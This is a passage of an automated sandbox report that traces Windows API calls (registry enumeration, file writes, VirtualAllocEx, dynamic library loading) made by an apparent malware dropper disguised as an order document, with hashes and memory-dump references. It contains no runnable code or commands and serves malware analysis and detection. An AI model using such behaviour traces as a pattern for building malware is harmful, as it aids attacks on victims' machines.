                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  • Opcode ID: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                  • Instruction ID: ce9828fb533201d430d1dfc272b0b5c9437a35d96f5815e0f5c69034b7ba0116
                                                  • Opcode Fuzzy Hash: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                  • Instruction Fuzzy Hash: 0021F372944150EBDB20BBA4DE85A5E33A8AB04714718093FF552F32D0C6BC9C918B9D
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 73bc9f92909011ac1234a364c328917f4c094328828aa5ee9b6a62c60ef37f74
                                                  • Instruction ID: fde7ee3b690bf0a9f1400c3c006cad269c6ae989cb90eb9f0638982b81c2946e
                                                  • Opcode Fuzzy Hash: 73bc9f92909011ac1234a364c328917f4c094328828aa5ee9b6a62c60ef37f74
                                                  • Instruction Fuzzy Hash: B0017C71A04615ABEB149F94DE58BAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction ID: 0f6a82c9814b8130565900c4f77509fb73920235a48305220d01948b4924e2c4
                                                  • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction Fuzzy Hash: 31317170640219BBDB22DF59ED48A9E3FA8EB00359F10443BF904FA1D1D3788E519BA9
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: fd1f55a540221de83200365c4b3a84b925a12d486a747a095f062a278a71ea17
                                                  • Instruction ID: a1e8d7c51e2174fe69d0a38a45018fa5c8ecdbf0c3d6cccc33ed9d3604573096
                                                  • Opcode Fuzzy Hash: fd1f55a540221de83200365c4b3a84b925a12d486a747a095f062a278a71ea17
                                                  • Instruction Fuzzy Hash: 5A119E71A0421AEADF15DFA0DA589AEB7B4FF04348F20443FE402B62D0D3B88A45DB5D
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                  • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                  • GetLastError.KERNEL32 ref: 00405C46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                  • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                  • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                  • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                    • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                    • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                    • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                  • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                  • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                  • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 00406196
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                  • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                  • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 74332C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 146bf7869be4871c07467018dbea82bc1afea7d85a06b412de1c13e03d71e4ad
                                                  • Instruction ID: 1ec08ece9ed8e9a2abe39542d62d15197e5e315d0381f004c748da274feb000d
                                                  • Opcode Fuzzy Hash: 146bf7869be4871c07467018dbea82bc1afea7d85a06b412de1c13e03d71e4ad
                                                  • Instruction Fuzzy Hash: 7A41B6B2604204EFEB11DF65D984FA93B7CFF88311FB1886AE40DC6150D63AA681CBD1
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                  • Instruction ID: 25ca00dcee0cf0708ebb41b42c3bcfe7940f6ca7f4ca5ddd9dc2277bf7af936e
                                                  • Opcode Fuzzy Hash: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                  • Instruction Fuzzy Hash: 04E06D71A08104AAEB04ABA5AE49CAF7379AF90345B20443FF101B00D8C6794D119A2D
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                  • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                  APIs
                                                  • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00411C08,0040CEF0,0040359E,0040CEF0,00411C08,00414EF0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                  APIs
                                                  • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040361A,00008001,00008001,0040351E,00414EF0,00004000,?,00000000,004033C8), ref: 00406229
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
